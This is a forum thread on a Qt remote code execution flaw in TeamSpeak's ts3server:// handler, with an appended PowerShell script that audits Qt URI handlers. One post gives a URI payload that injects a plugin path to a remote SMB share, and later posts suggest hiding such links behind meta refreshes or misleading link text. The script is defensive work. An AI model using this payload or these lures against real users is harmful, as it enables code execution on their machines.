Discussion: Remote Code Execution vulnerability in Qt (Client < 3.2.5)

fyfywka (Contributor):

Bluscream (Retired Staff, Contributor):

If it's that, you would need to trick the user into clicking something like a link whose visible text is ts3server://voice.teamspeak.com but whose actual target is ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share

DrWarpMan (Member):
Was it anyone from r4p3 who found this?

Kieran (Contributor):
Very interesting. So basically you tell Qt 'Ye, to load your DLLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you could even put that on a website and kind of obfuscate the exploit in TS by putting the custom ts3server URI handler as a meta refresh on a page like mynotinnocenthomepage.com/puppies.html, right?

InVaDeR359 (Active Member):
Kieran said: "Very interesting. So basically you tell Qt 'Ye, to load your DLLs pls look for them in "\\x.x.x.x\explt" when you start up thx'? That means you could even put that on a website and kind of obfuscate the exploit in TS by putting the custom ts3server URI handler as a meta refresh on a page like mynotinnocenthomepage.com/puppies.html, right?"

I think you mean a link that displays myinnocenthomepage.com/puppies.html but actually points to mynotinnocenthomepage.com/puppies.html.

Kieran (Contributor):
InVaDeR359 said: "I think you mean a link that displays myinnocenthomepage.com/puppies.html but actually points to mynotinnocenthomepage.com/puppies.html."

Also a possibility, but that may spark suspicion when someone copies the link instead of clicking right away and the displayed URL is different from the one that is linked.

Asphyxia (Server Monkey, Administrator):
DrWarpMan said: "Was it anyone from r4p3 who found this?"

No. Software development frameworks offer a lot of extensibility to developers so they can work with and around the operating system. With frameworks being so powerful, they have the potential to be abused and ultimately misused for malicious purposes by hackers. This issue was found in Qt, not specifically in TeamSpeak, but thankfully they (the TeamSpeak developers) are staying on top of security patches, probably because we have made them rightfully paranoid, which is a GOOD thing. We have done our job; now we are safer.

With that said, there may be more security issues with many frameworks like Qt (TeamSpeak uses this framework for their software).

One example can be found here: https://securiteam.com/unixfocus/5NP0O2KDPI/ or http://scary.beasts.org/security/CESA-2004-004.txt

I believe something similar to this was used when we developed the avatar crasher: https://r4p3.net/threads/teamspeak-3-avatar-crash-client-3-0-0-3-0-17.335/



If we had found a way to utilize this vulnerability, we would have released a PoC (Proof of Concept) demonstrating how one could use it, for educational purposes.

People like @Harrasan think everything in life comes free and no one has to work for anything. He is actually really close to being banned, because you can find him complaining about everything and thinking proficient security researchers need $0 to run expensive servers and to study in $8,000 reverse engineering classes to become malware analysts and incident responders for the FBI/NSA/etc.

Update: A PoC is over here https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739



Looks very simple: a security mistake that is small, with big issues possible.

tagKnife (Well-Known Member):
Origin got hit by the same exploit.

AMD also uses Qt, but it looks like they don't have a URI registered, at least not on my system.
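The mechanism Bluscream and Kieran describe above (a URI handler that hands the URL to a Qt executable, where an embedded -platformpluginpath switch points Qt at an attacker's SMB share for its plugin DLLs) and tagKnife's question of which other Qt applications on a machine have a URI scheme registered can both be checked with the script below. This is an added example, not code from the thread, from TeamSpeak, from Qt or from the ZDI write-up. The registry layout it walks, the Qt core DLL names it looks for, and the simplified command-line tokenizer it uses to model how %1 lands on the new process's command line are all assumptions of the example; the payload string is the one from Bluscream's post.

```powershell
# Added example (not from the thread, TeamSpeak or Qt): audit the URI protocol
# handlers registered on this Windows host, flag the ones that launch a Qt
# application, and show how the thread's ts3server:// payload would look on
# that application's command line.
# Assumptions (not from the thread): a scheme is a key HKCR:\<scheme> that
# carries an empty "URL Protocol" value and a shell\open\command subkey; a Qt
# application is recognised by a Qt core DLL beside the executable; the
# tokenizer below is a simplified model of Windows argv splitting (quotes
# group, whitespace separates; backslash-escaped quotes are not modelled).

# Constructed payload, taken from the thread (192.168.131.152 is the thread's example host).
$Payload = 'ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share'

function Get-UriProtocolHandler {
    if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT -Scope Script | Out-Null
    }
    # Keys starting with "." are file extensions, never URI schemes; skipping them saves time.
    foreach ($key in Get-ChildItem -Path 'HKCR:\' -ErrorAction SilentlyContinue |
                     Where-Object { $_.PSChildName -notlike '.*' }) {
        $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        if ($null -eq $props -or -not ($props.PSObject.Properties.Name -contains 'URL Protocol')) { continue }
        $cmdKey = "HKCR:\$($key.PSChildName)\shell\open\command"
        if (-not (Test-Path -Path $cmdKey)) { continue }
        $cmd = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
        if ([string]::IsNullOrWhiteSpace($cmd)) { continue }
        [pscustomobject]@{ Scheme = $key.PSChildName; Command = $cmd }
    }
}

function Get-ExePathFromCommand([string]$Command) {
    # Either a quoted path ("C:\Program Files\x\y.exe" "%1") or a bare first token.
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(\S+)')     { return $Matches[1] }
    return $null
}

function Test-QtApplication([string]$ExePath) {
    if ([string]::IsNullOrEmpty($ExePath) -or -not (Test-Path -LiteralPath $ExePath)) { return $false }
    $dir = Split-Path -Parent $ExePath
    foreach ($dll in 'Qt6Core.dll', 'Qt5Core.dll', 'QtCore4.dll') {
        if (Test-Path -LiteralPath (Join-Path $dir $dll)) { return $true }
    }
    return $false
}

function Get-SubstitutedArguments([string]$Command, [string]$Uri) {
    # The shell replaces %1 with the URI verbatim; the new process then splits the
    # resulting command line. With "%1" the URI stays one argument; with a bare %1
    # every space-separated piece becomes its own argument, so the embedded
    # -platformpluginpath switch and the UNC path arrive as separate argv entries.
    $line = $Command.Replace('%1', $Uri)
    $tokens = foreach ($m in [regex]::Matches($line, '"([^"]*)"|(\S+)')) {
        if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
    }
    return @($tokens)
}

function Get-QtHandlerReport {
    foreach ($h in Get-UriProtocolHandler) {
        $exe = Get-ExePathFromCommand -Command $h.Command
        if (-not (Test-QtApplication -ExePath $exe)) { continue }
        $tokens = Get-SubstitutedArguments -Command $h.Command -Uri $Payload
        $idx    = [array]::IndexOf($tokens, '-platformpluginpath')
        [pscustomobject]@{
            Scheme          = $h.Scheme
            Executable      = $exe
            QuotedUriArg    = [bool]($h.Command -match '"%1"')
            SwitchSplitsOut = ($idx -ge 0)
            PluginPathSeen  = if ($idx -ge 0 -and $idx + 1 -lt $tokens.Count) { $tokens[$idx + 1] } else { $null }
        }
    }
}

Get-QtHandlerReport | Format-Table -AutoSize
```

Reading HKCR needs no elevation. A handler that shows SwitchSplitsOut as true passes the injected switch straight through as its own argument; a quoted "%1" keeps the whole URI in one argument on the command line, but whether the application then re-parses that argument itself is application-specific and is not something this script can tell, so any Qt application with a registered scheme is worth patching regardless of what the table shows (for TeamSpeak, that is the 3.2.5 client the thread title refers to).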
